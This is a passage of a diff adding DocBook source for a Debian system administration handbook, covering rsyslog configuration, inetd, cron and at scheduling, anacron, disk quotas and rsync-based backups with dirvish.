+						<literal>debug</literal>: debugging message.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+
+		</section>
+		 <section id="sect.syslog-config">
+			<title>The Configuration File</title>
+			 <para>
+				The syntax of the <filename>/etc/rsyslog.conf</filename> file is detailed in the <citerefentry><refentrytitle>rsyslog.conf</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> manual page, but there is also HTML documentation available in the <emphasis role="pkg">rsyslog-doc</emphasis> package (<filename>/usr/share/doc/rsyslog-doc/html/index.html</filename>). The overall principle is to write “selector” and “action” pairs. The selector defines all relevant messages, and the actions describes how to deal with them.
+			</para>
+			 <section id="sect.syslog-selector-syntax">
+				<title>Syntax of the Selector</title>
+				 <para>
+					The selector is a semicolon-separated list of <literal><replaceable>subsystem</replaceable>.<replaceable>priority</replaceable></literal> pairs (example: <literal>auth.notice;mail.info</literal>). An asterisk may represent all subsystems or all priorities (examples: <literal>*.alert</literal> or <literal>mail.*</literal>). Several subsystems can be grouped, by separating them with a comma (example: <literal>auth,mail.info</literal>). The priority indicated also covers messages of equal or higher priority; thus <literal>auth.alert</literal> indicates the <literal>auth</literal> subsystem messages of <literal>alert</literal> or <literal>emerg</literal> priority. Prefixed with an exclamation point (!), it indicates the opposite, in other words the strictly lower priorities; <literal>auth.!notice</literal>, thus, indicates messages issued from <literal>auth</literal>, with <literal>info</literal> or <literal>debug</literal> priority. Prefixed with an equal sign (=), it corresponds to precisely and only the priority indicated (<literal>auth.=notice</literal> only concerns messages from <literal>auth</literal> with <literal>notice</literal> priority).
+				</para>
+				 <para>
+					Each element in the list on the selector overrides previous elements. It is thus possible to restrict a set or to exclude certain elements from it. For example, <literal>kern.info;kern.!err</literal> means messages from the kernel with priority between <literal>info</literal> and <literal>warn</literal>. The <literal>none</literal> priority indicates the empty set (no priorities), and may serve to exclude a subsystem from a set of messages. Thus, <literal>*.crit;kern.none</literal> indicates all the messages of priority equal to or higher than <literal>crit</literal> not coming from the kernel.
+				</para>
+
+			</section>
+			 <section id="sect.syslog-action-syntax">
+				<title>Syntax of Actions</title>
+				 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> The named pipe, a persistent pipe</title>
+				 <indexterm>
+					<primary>named pipe</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>pipe, named pipe</primary>
+				</indexterm>
+				 <para>
+					A named pipe is a particular type of file that operates like a traditional pipe (the pipe that you make with the “|” symbol on the command line), but via a file. This mechanism has the advantage of being able to relate two unrelated processes. Anything written to a named pipe blocks the process that writes until another process attempts to read the data written. This second process reads the data written by the first, which can then resume execution.
+				</para>
+				 <para>
+					Such a file is created with the <command>mkfifo</command> command.
+				</para>
+				 </sidebar> <para>
+					The various possible actions are:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							add the message to a file (example: <filename>/var/log/messages</filename>);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							send the message to a remote <command>syslog</command> server (example: <literal>@log.falcot.com</literal>);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							send the message to an existing named pipe (example: <literal>|/dev/xconsole</literal>);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							send the message to one or more users, if they are logged in (example: <literal>root,rhertzog</literal>);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							send the message to all logged in users (example: <literal>*</literal>);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							write the message in a text console (example: <literal>/dev/tty8</literal>).
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <sidebar> <title><emphasis>SECURITY</emphasis> Forwarding logs</title>
+				 <indexterm>
+					<primary>log</primary>
+					<secondary>forwarding</secondary>
+				</indexterm>
+				 <para>
+					It is a good idea to record the most important logs on a separate machine (perhaps dedicated for this purpose), since this will prevent any possible intruder from removing traces of their intrusion (unless, of course, they also compromise this other server). Furthermore, in the event of a major problem (such as a kernel crash), you have the logs available on another machine, which increases your chances of determining the sequence of events that caused the crash.
+				</para>
+				 <para>
+					To accept log messages sent by other machines, you must reconfigure <emphasis>rsyslog</emphasis>: in practice, it is sufficient to activate the ready-for-use entries in <filename>/etc/rsyslog.conf</filename> (<literal>$ModLoad imudp</literal> and <literal>$UDPServerRun 514</literal>).
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.inetd">
+		<title>The <command>inetd</command> Super-Server</title>
+		 <para>
+			Inetd (often called “Internet super-server”) is a server of servers. It executes rarely used servers on demand, so that they do not have to run continuously.
+		</para>
+		 <indexterm>
+			<primary><command>inetd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>super-server</primary>
+		</indexterm>
+		 <para>
+			The <filename>/etc/inetd.conf</filename> file lists these servers and their usual ports. The <command>inetd</command> command listens to all of them; when it detects a connection to any such port, it executes the corresponding server program.
+		</para>
+		 <sidebar> <title><emphasis>DEBIAN POLICY</emphasis> Register a server in <filename>inetd.conf</filename></title>
+		 <para>
+			Packages frequently want to register a new server in the <filename>/etc/inetd.conf</filename> file, but Debian Policy prohibits any package from modifying a configuration file that it doesn't own. This is why the <command>update-inetd</command> script (in the package with the same name) was created: It manages the configuration file, and other packages can thus use it to register a new server to the super-server's configuration.
+		</para>
+		 </sidebar> <para>
+			Each significant line of the <filename>/etc/inetd.conf</filename> file describes a server through seven fields (separated by spaces):
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					The TCP or UDP port number, or the service name (which is mapped to a standard port number with the information contained in the <filename>/etc/services</filename> file).
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					The socket type: <literal>stream</literal> for a TCP connection, <literal>dgram</literal> for UDP datagrams.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					The protocol: <literal>tcp</literal> or <literal>udp</literal>.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					The options: two possible values: <literal>wait</literal> or <literal>nowait</literal>, to tell <command>inetd</command> whether it should wait or not for the end of the launched process before accepting another connection. For TCP connections, easily multiplexable, you can usually use <literal>nowait</literal>. For programs responding over UDP, you should use <literal>nowait</literal> only if the server is capable of managing several connections in parallel. You can suffix this field with a period, followed by the maximum number of connections authorized per minute (the default limit is 256).
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					The user name of the user under whose identity the server will run.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					The full path to the server program to execute.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					The arguments: this is a complete list of the program's arguments, including its own name (<literal>argv[0]</literal> in C).
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			The following example illustrates the most common cases:
+		</para>
+		 <example id="example.inetd-conf">
+			<title>Excerpt from <filename>/etc/inetd.conf</filename></title>
+			 
+<programlisting>talk   dgram  udp wait    nobody.tty /usr/sbin/in.talkd in.talkd
+finger stream tcp nowait  nobody     /usr/sbin/tcpd     in.fingerd
+ident  stream tcp nowait  nobody     /usr/sbin/identd   identd -i
+</programlisting>
+
+		</example>
+		 <indexterm>
+			<primary><command>tcpd</command></primary>
+		</indexterm>
+		 <para>
+			The <command>tcpd</command> program is frequently used in the <filename>/etc/inetd.conf</filename> file. It allows limiting incoming connections by applying access control rules, documented in the <citerefentry><refentrytitle>hosts_access</refentrytitle>
+			<manvolnum>5</manvolnum></citerefentry> manual page, and which are configured in the <filename>/etc/hosts.allow</filename> and <filename>/etc/hosts.deny</filename> files. Once it has been determined that the connection is authorized, <command>tcpd</command> executes the real server (like <command>in.fingerd</command> in our example). It is worth noting that <command>tcpd</command> relies on the name under which it was invoked (that is the first argument, <literal>argv[0]</literal>) to identify the real program to run. So you should not start the arguments list with <literal>tcpd</literal> but with the program that must be wrapped.
+		</para>
+		 <sidebar> <title><emphasis>COMMUNITY</emphasis> Wietse Venema</title>
+		 <indexterm>
+			<primary>Wietse Venema</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Venema, Wietse</primary>
+		</indexterm>
+		 <para>
+			Wietse Venema, whose expertise in security has made him a renowned programmer, is the author of the <command>tcpd</command> program. He is also the main creator of Postfix, the modular e-mail server (SMTP, Simple Mail Transfer Protocol), designed to be safer and more reliable than <command>sendmail</command>, which features a long history of security vulnerabilities.
+		</para>
+		 </sidebar> <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Other <command>inetd</command> commands</title>
+		 <para>
+			While Debian installs <emphasis role="pkg">openbsd-inetd</emphasis> by default, there is no lack of alternatives: we can mention <emphasis role="pkg">inetutils-inetd</emphasis>, <emphasis role="pkg">micro-inetd</emphasis>, <emphasis role="pkg">rlinetd</emphasis> and <emphasis role="pkg">xinetd</emphasis>.
+		</para>
+		 <para>
+			This last incarnation of a super-server offers very interesting possibilities. Most notably, its configuration can be split into several files (stored, of course, in the <filename>/etc/xinetd.d/</filename> directory), which can make an administrator's life easier.
+		</para>
+		 <para>
+			Last but not least, it is even possible to emulate <command>inetd</command>'s behaviour with <command>systemd</command>'s socket-activation mechanism (see <xref linkend="sect.systemd" />).
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.task-scheduling-cron-atd">
+		<title>Scheduling Tasks with <command>cron</command> and <command>atd</command></title>
+		 <indexterm>
+			<primary><command>cron</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>atd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>scheduled commands</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>command scheduling</primary>
+		</indexterm>
+		 <para>
+			<command>cron</command> is the daemon responsible for executing scheduled and recurring commands (every day, every week, etc.); <command>atd</command> is that which deals with commands to be executed a single time, but at a specific moment in the future.
+		</para>
+		 <para>
+			In a Unix system, many tasks are scheduled for regular execution:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					rotating the logs;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					updating the database for the <command>locate</command> program;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					back-ups;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					maintenance scripts (such as cleaning out temporary files).
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			By default, all users can schedule the execution of tasks. Each user has thus their own <emphasis>crontab</emphasis> in which they can record scheduled commands. It can be edited by running <command>crontab -e</command> (its content is stored in the <filename>/var/spool/cron/crontabs/<replaceable>user</replaceable></filename> file).
+		</para>
+		 <sidebar> <title><emphasis>SECURITY</emphasis> Restricting <command>cron</command> or <command>atd</command></title>
+		 <para>
+			You can restrict access to <command>cron</command> by creating an explicit authorization file (whitelist) in <filename>/etc/cron.allow</filename>, in which you indicate the only users authorized to schedule commands. All others will automatically be deprived of this feature. Conversely, to only block one or two troublemakers, you could write their username in the explicit prohibition file (blacklist), <filename>/etc/cron.deny</filename>. This same feature is available for <command>atd</command>, with the <filename>/etc/at.allow</filename> and <filename>/etc/at.deny</filename> files.
+		</para>
+		 </sidebar> <para>
+			The root user has their own <emphasis>crontab</emphasis>, but can also use the <filename>/etc/crontab</filename> file, or write additional <emphasis>crontab</emphasis> files in the <filename>/etc/cron.d</filename> directory. These last two solutions have the advantage of being able to specify the user identity to use when executing the command.
+		</para>
+		 <para>
+			The <emphasis>cron</emphasis> package includes by default some scheduled commands that execute:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					programs in the <filename>/etc/cron.hourly/</filename> directory once per hour;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					programs in <filename>/etc/cron.daily/</filename> once per day;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					programs in <filename>/etc/cron.weekly/</filename> once per week;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					programs in <filename>/etc/cron.monthly/</filename> once per month.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			Many Debian packages rely on this service: by putting maintenance scripts in these directories, they ensure optimal operation of their services.
+		</para>
+		 <section id="sect.format-crontab">
+			<title>Format of a <filename>crontab</filename> File</title>
+			 <indexterm>
+				<primary><filename>crontab</filename></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>TIP</emphasis> Text shortcuts for <command>cron</command></title>
+			 <para>
+				<command>cron</command> recognizes some abbreviations which replace the first five fields in a <filename>crontab</filename> entry. They correspond to the most classic scheduling options:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>@yearly</literal>: once per year (January 1, at 00:00);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>@monthly</literal>: once per month (the 1st of the month, at 00:00);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>@weekly</literal>: once per week (Sunday at 00:00);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>@daily</literal>: once per day (at 00:00);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>@hourly</literal>: once per hour (at the beginning of each hour).
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 </sidebar> <sidebar> <title><emphasis>SPECIAL CASE</emphasis> <command>cron</command> and daylight savings time</title>
+			 <para>
+				In Debian, <command>cron</command> takes the time change (for Daylight Savings Time, or in fact for any significant change in the local time) into account as best as it can. Thus, the commands that should have been executed during an hour that never existed (for example, tasks scheduled at 2:30 am during the Spring time change in France, since at 2:00 am the clock jumps directly to 3:00 am) are executed shortly after the time change (thus around 3:00 am DST). On the other hand, in autumn, when commands would be executed several times (2:30 am DST, then an hour later at 2:30 am standard time, since at 3:00 am DST the clock turns back to 2:00 am) are only executed once.
+			</para>
+			 <para>
+				Be careful, however, if the order in which the different scheduled tasks and the delay between their respective executions matters, you should check the compatibility of these constraints with <command>cron</command>'s behavior; if necessary, you can prepare a special schedule for the two problematic nights per year.
+			</para>
+			 </sidebar> <para>
+				Each significant line of a <emphasis>crontab</emphasis> describes a scheduled command with the six (or seven) following fields:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						the value for the minute (number from 0 to 59);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the value for the hour (from 0 to 23);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the value for the day of the month (from 1 to 31);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the value for the month (from 1 to 12);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the value for the day of the week (from 0 to 7, 1 corresponding to Monday, Sunday being represented by both 0 and 7; it is also possible to use the first three letters of the name of the day of the week in English, such as <literal>Sun</literal>, <literal>Mon</literal>, etc.);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the user name under whose identity the command must be executed (in the <filename>/etc/crontab</filename> file and in the fragments located in <filename>/etc/cron.d/</filename>, but not in the users' own crontab files);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the command to execute (when the conditions defined by the first five columns are met).
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				All these details are documented in the <citerefentry><refentrytitle>crontab</refentrytitle>
+				 <manvolnum>5</manvolnum></citerefentry> man page.
+			</para>
+			 <para>
+				Each value can be expressed in the form of a list of possible values (separated by commas). The syntax <literal>a-b</literal> describes the interval of all the values between <literal>a</literal> and <literal>b</literal>. The syntax <literal>a-b/c</literal> describes the interval with an increment of <literal>c</literal> (example: <literal>0-10/2</literal> means <literal>0,2,4,6,8,10</literal>). An asterisk <literal>*</literal> is a wildcard, representing all possible values.
+			</para>
+			 <example id="example.crontab">
+				<title>Sample <filename>crontab</filename> file</title>
+				 
+<programlisting>#Format
+#min hour day mon dow  command
+
+# Download data every night at 7:25 pm
+ 25  19   *   *   *    $HOME/bin/get.pl
+
+# 8:00 am, on weekdays (Monday through Friday)
+ 00  08   *   *   1-5  $HOME/bin/dosomething
+
+# Restart the IRC proxy after each reboot
+@reboot /usr/bin/dircproxy
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>TIP</emphasis> Executing a command on boot</title>
+			 <para>
+				To execute a command a single time, just after booting the computer, you can use the <literal>@reboot</literal> macro (a simple restart of <command>cron</command> does not trigger a command scheduled with <literal>@reboot</literal>). This macro replaces the first five fields of an entry in the <emphasis>crontab</emphasis>.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Emulating <command>cron</command> with <command>systemd</command></title>
+			 <para>
+				It is possible to emulate part of <command>cron</command>'s behaviour with <command>systemd</command>'s timer mechanism (see <xref linkend="sect.systemd" />).
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.at-command">
+			<title>Using the <command>at</command> Command</title>
+			 <indexterm>
+				<primary><command>at</command></primary>
+			</indexterm>
+			 <para>
+				The <command>at</command> executes a command at a specified moment in the future. It takes the desired time and date as command-line parameters, and the command to be executed in its standard input. The command will be executed as if it had been entered in the current shell. <command>at</command> even takes care to retain the current environment, in order to reproduce the same conditions when it executes the command. The time is indicated by following the usual conventions: <literal>16:12</literal> or <literal>4:12pm</literal> represents 4:12 pm. The date can be specified in several European and Western formats, including <literal>DD.MM.YY</literal> (<literal>27.07.15</literal> thus representing 27 July 2015), <literal>YYYY-MM-DD</literal> (this same date being expressed as <literal>2015-07-27</literal>), <literal>MM/DD/[CC]YY</literal> (ie., <literal>12/25/15</literal> or <literal>12/25/2015</literal> will be December 25, 2015), or simple <literal>MMDD[CC]YY</literal> (so that <literal>122515</literal> or <literal>12252015</literal> will, likewise, represent December 25, 2015). Without it, the command will be executed as soon as the clock reaches the time indicated (the same day, or tomorrow if that time has already passed on the same day). You can also simply write “today” or “tomorrow”, which is self-explanatory.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>at 09:00 27.07.15 &lt;&lt;END</userinput>
+<computeroutput>&gt; </computeroutput><userinput>echo "Don't forget to wish a Happy Birthday to Raphaël!" \</userinput>
+<computeroutput>&gt; </computeroutput><userinput>  | mail lolando@debian.org</userinput>
+<computeroutput>&gt; </computeroutput><userinput>END</userinput>
+<computeroutput>warning: commands will be executed using /bin/sh
+job 31 at Mon Jul 27 09:00:00 2015</computeroutput></screen>
+			 <para>
+				An alternative syntax postpones the execution for a given duration: <command>at now + <replaceable>number</replaceable> <replaceable>period</replaceable></command>. The <replaceable>period</replaceable> can be <literal>minutes</literal>, <literal>hours</literal>, <literal>days</literal>, or <literal>weeks</literal>. The <replaceable>number</replaceable> simply indicates the number of said units that must elapse before execution of the command.
+			</para>
+			 <para>
+				To cancel a task scheduled by <command>cron</command>, simply run <command>crontab -e</command> and delete the corresponding line in the <emphasis>crontab</emphasis> file. For <command>at</command> tasks, it is almost as easy: run <command>atrm <replaceable>task-number</replaceable></command>. The task number is indicated by the <command>at</command> command when you scheduled it, but you can find it again with the <command>atq</command> command, which gives the current list of scheduled tasks.
+			</para>
+			 <indexterm>
+				<primary><command>atrm</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>atq</command></primary>
+			</indexterm>
+
+		</section>
+
+	</section>
+	 <section id="sect.asynchronous-task-scheduling-anacron">
+		<title>Scheduling Asynchronous Tasks: <command>anacron</command></title>
+		 <para>
+			<command>anacron</command> is the daemon that completes <command>cron</command> for computers that are not on at all times. Since regular tasks are usually scheduled for the middle of the night, they will never be executed if the computer is off at that time. The purpose of <command>anacron</command> is to execute them, taking into account periods in which the computer is not working.
+		</para>
+		 <indexterm>
+			<primary><command>anacron</command></primary>
+		</indexterm>
+		 <para>
+			Please note that <command>anacron</command> will frequently execute such activity a few minutes after booting the machine, which can render the computer less responsive. This is why the tasks in the <filename>/etc/anacrontab</filename> file are started with the <command>nice</command> command, which reduces their execution priority and thus limits their impact on the rest of the system. Beware, the format of this file is not the same as that of <filename>/etc/crontab</filename>; if you have particular needs for <command>anacron</command>, see the <citerefentry><refentrytitle>anacrontab</refentrytitle>
+			 <manvolnum>5</manvolnum></citerefentry> manual page.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Priorities and <command>nice</command></title>
+		 <para>
+			Unix systems (and thus Linux) are multi-tasking and multi-user systems. Indeed, several processes can run in parallel, and be owned by different users: the kernel mediates access to the resources between the different processes. As a part of this task, it has a concept of priority, which allows it to favor certain processes over others, as needed. When you know that a process can run in low priority, you can indicate so by running it with <command>nice <replaceable>program</replaceable></command>. The program will then have a smaller share of the CPU, and will have a smaller impact on other running processes. Of course, if no other processes needs to run, the program will not be artificially held back.
+		</para>
+		 <para>
+			<command>nice</command> works with levels of “niceness”: the positive levels (from 1 to 19) progressively lower the priority, while the negative levels (from -1 to -20) will increase it — but only root can use these negative levels. Unless otherwise indicated (see the <citerefentry><refentrytitle>nice</refentrytitle>
+			 <manvolnum>1</manvolnum></citerefentry> manual page), <command>nice</command> increases the current level by 10.
+		</para>
+		 <para>
+			If you discover that an already running task should have been started with <command>nice</command> it is not too late to fix it; the <command>renice</command> command changes the priority of an already running process, in either direction (but reducing the “niceness” of a process is reserved for the root user).
+		</para>
+		 </sidebar> <para>
+			Installation of the <emphasis role="pkg">anacron</emphasis> package deactivates execution by <command>cron</command> of the scripts in the <filename>/etc/cron.hourly/</filename>, <filename>/etc/cron.daily/</filename>, <filename>/etc/cron.weekly/</filename>, and <filename>/etc/cron.monthly/</filename> directories. This avoids their double execution by <command>anacron</command> and <command>cron</command>. The <command>cron</command> command remains active and will continue to handle the other scheduled tasks (especially those scheduled by users).
+		</para>
+
+	</section>
+	 <section id="sect.quotas">
+		<title>Quotas</title>
+		 <indexterm>
+			<primary>quota</primary>
+		</indexterm>
+		 <para>
+			The quota system allows limiting disk space allocated to a user or group of users. To set it up, you must have a kernel that supports it (compiled with the <varname>CONFIG_QUOTA</varname> option) — as is the case with Debian kernels. The quota management software is found in the <emphasis role="pkg">quota</emphasis> Debian package.
+		</para>
+		 <para>
+			To activate quota in a filesystem, you have to indicate the <literal>usrquota</literal> and <literal>grpquota</literal> options in <filename>/etc/fstab</filename> for the user and group quotas, respectively. Rebooting the computer will then update the quotas in the absence of disk activity (a necessary condition for proper accounting of already used disk space).
+		</para>
+		 <para>
+			The <command>edquota <replaceable>user</replaceable></command> (or <command>edquota -g <replaceable>group</replaceable></command>) command allows you to change the limits while examining current disk space usage.
+		</para>
+		 <indexterm>
+			<primary><command>edquota</command></primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Defining quotas with a script</title>
+		 <indexterm>
+			<primary><command>setquota</command></primary>
+		</indexterm>
+		 <para>
+			The <command>setquota</command> program can be used in a script to automatically change many quotas. Its <citerefentry><refentrytitle>setquota</refentrytitle>
+			 <manvolnum>8</manvolnum></citerefentry> manual page details the syntax to use.
+		</para>
+		 </sidebar> <para>
+			The quota system allows you to set four limits:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					two limits (called “soft” and “hard”) refer to the number of blocks consumed. If the filesystem was created with a block-size of 1 kibibyte, a block contains 1024 bytes from the same file. Unsaturated blocks thus induce losses of disk space. A quota of 100 blocks, which theoretically allows storage of 102,400 bytes, will however be saturated with just 100 files of 500 bytes each, only representing 50,000 bytes in total.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					two limits (soft and hard) refer to the number of inodes used. Each file occupies at least one inode to store information about it (permissions, owner, timestamp of last access, etc.). It is thus a limit on the number of user files.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			A “soft” limit can be temporarily exceeded; the user will simply be warned that they are exceeding the quota by the <command>warnquota</command> command, which is usually invoked by <command>cron</command>. A “hard” limit can never be exceeded: the system will refuse any operation that will cause a hard quota to be exceeded.
+		</para>
+		 <sidebar> <title><emphasis>VOCABULARY</emphasis> Blocks and inodes</title>
+		 <indexterm>
+			<primary>block (disk)</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>inode</primary>
+		</indexterm>
+		 <para>
+			The filesystem divides the hard drive into blocks — small contiguous areas. The size of these blocks is defined during creation of the filesystem, and generally varies between 1 and 8 kibibytes.
+		</para>
+		 <para>
+			A block can be used either to store the real data of a file, or for meta-data used by the filesystem. Among this meta-data, you will especially find the inodes. An inode uses a block on the hard drive (but this block is not taken into consideration in the block quota, only in the inode quota), and contains both the information on the file to which it corresponds (name, owner, permissions, etc.) and the pointers to the data blocks that are actually used. For very large files that occupy more blocks than it is possible to reference in a single inode, there is an indirect block system; the inode references a list of blocks that do not directly contain data, but another list of blocks.
+		</para>
+		 </sidebar> <indexterm>
+			<primary><command>warnquota</command></primary>
+		</indexterm>
+		 <para>
+			With the <command>edquota -t</command> command, you can define a maximum authorized “grace period” within which a soft limit may be exceeded. After this period, the soft limit will be treated like a hard limit, and the user will have to reduce their disk space usage to within this limit in order to be able to write anything to the hard drive.
+		</para>
+		 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Setting up a default quota for new users</title>
+		 <para>
+			To automatically setup a quota for new users, you have to configure a template user (with <command>edquota</command> or <command>setquota</command>) and indicate their user name in the <varname>QUOTAUSER</varname> variable in the <filename>/etc/adduser.conf</filename> file. This quota configuration will then be automatically applied to each new user created with the <command>adduser</command> command.
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.backup">
+		<title>Backup</title>
+		 <para>
+			Making backups is one of the main responsibilities of any administrator, but it is a complex subject, involving powerful tools which are often difficult to master.
+		</para>
+		 <indexterm>
+			<primary>backup</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>restoration</primary>
+		</indexterm>
+		 <para>
+			Many programs exist, such as <command>amanda</command>, <command>bacula</command>, <command>BackupPC</command>. Those are client/server system featuring many options, whose configuration is rather difficult. Some of them provide user-friendly web interfaces to mitigate this. But Debian contains dozens of other backup software covering all possible use cases, as you can easily confirm with <command>apt-cache search backup</command>.
+		</para>
+		 <indexterm>
+			<primary><command>amanda</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>bacula</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>BackupPC</command></primary>
+		</indexterm>
+		 <para>
+			Rather than detailing some of them, this section will present the thoughts of the Falcot Corp administrators when they defined their backup strategy.
+		</para>
+		 <para>
+			At Falcot Corp, backups have two goals: recovering erroneously deleted files, and quickly restoring any computer (server or desktop) whose hard drive has failed.
+		</para>
+		 <section>
+			<title>Backing Up with <command>rsync</command></title>
+			 <para>
+				Backups on tape having been deemed too slow and costly, data will be backed up on hard drives on a dedicated server, on which the use of software RAID (see <xref linkend="sect.raid-soft" />) will protect the data from hard drive failure. Desktop computers are not backed up individually, but users are advised that their personal account on their department's file server will be backed up. The <command>rsync</command> command (from the package of the same name) is used daily to back up these different servers.
+			</para>
+			 <indexterm>
+				<primary><command>rsync</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> The hard link, a second name for the file</title>
+			 <indexterm>
+				<primary>link</primary>
+				<secondary>hard link</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>hard link</primary>
+			</indexterm>
+			 <para>
+				A hard link, as opposed to a symbolic link, cannot be differentiated from the linked file. Creating a hard link is essentially the same as giving an existing file a second name. This is why the deletion of a hard link only removes one of the names associated with the file. As long as another name is still assigned to the file, the data therein remain present on the filesystem. It is interesting to note that, unlike a copy, the hard link does not take up additional space on the hard drive.
+			</para>
+			 <para>
+				A hard link is created with the <command>ln <replaceable>target</replaceable> <replaceable>link</replaceable></command> command. The <replaceable>link</replaceable> file is then a new name for the <replaceable>target</replaceable> file. Hard links can only be created on the same filesystem, while symbolic links are not subject to this limitation.
+			</para>
+			 </sidebar> <para>
+				The available hard drive space prohibits implementation of a complete daily backup. As such, the <command>rsync</command> command is preceded by a duplication of the content of the previous backup with hard links, which prevents usage of too much hard drive space. The <command>rsync</command> process then only replaces files that have been modified since the last backup. With this mechanism a great number of backups can be kept in a small amount of space. Since all backups are immediately available and accessible (for example, in different directories of a given share on the network), you can quickly make comparisons between two given dates.
+			</para>
+			 <indexterm>
+				<primary>copy, backup copy</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>backup</primary>
+				<secondary>copy</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis role="pkg">dirvish</emphasis></primary>
+			</indexterm>
+			 <para>
+				This backup mechanism is easily implemented with the <command>dirvish</command> program. It uses a backup storage space (“bank” in its vocabulary) in which it places timestamped copies of sets of backup files (these sets are called “vaults” in the dirvish documentation).
+			</para>
+			 <para>
+				The main configuration is in the <filename>/etc/dirvish/master.conf</filename> file. It defines the location of the backup storage space, the list of “vaults” to manage, and default values for expiration of the backups. The rest of the configuration is located in the <filename><replaceable>bank</replaceable>/<replaceable>vault</replaceable>/dirvish/default.conf</filename> files and contains the specific configuration for the corresponding set of files.
+			</para>
+			 <example id="example.dirvish-master">
+				<title>The <filename>/etc/dirvish/master.conf</filename> file</title>
+				 
+<programlisting>bank:
+    /backup
+exclude:
+    lost+found/
+    core
+    *~
+Runall:
+    root    22:00
+expire-default: +15 days
+expire-rule:
+#   MIN HR    DOM MON       DOW  STRFTIME_FMT
+    *   *     *   *         1    +3 months
+    *   *     1-7 *         1    +1 year
+    *   *     1-7 1,4,7,10  1
+</programlisting>
+
+			</example>
+			 <para>
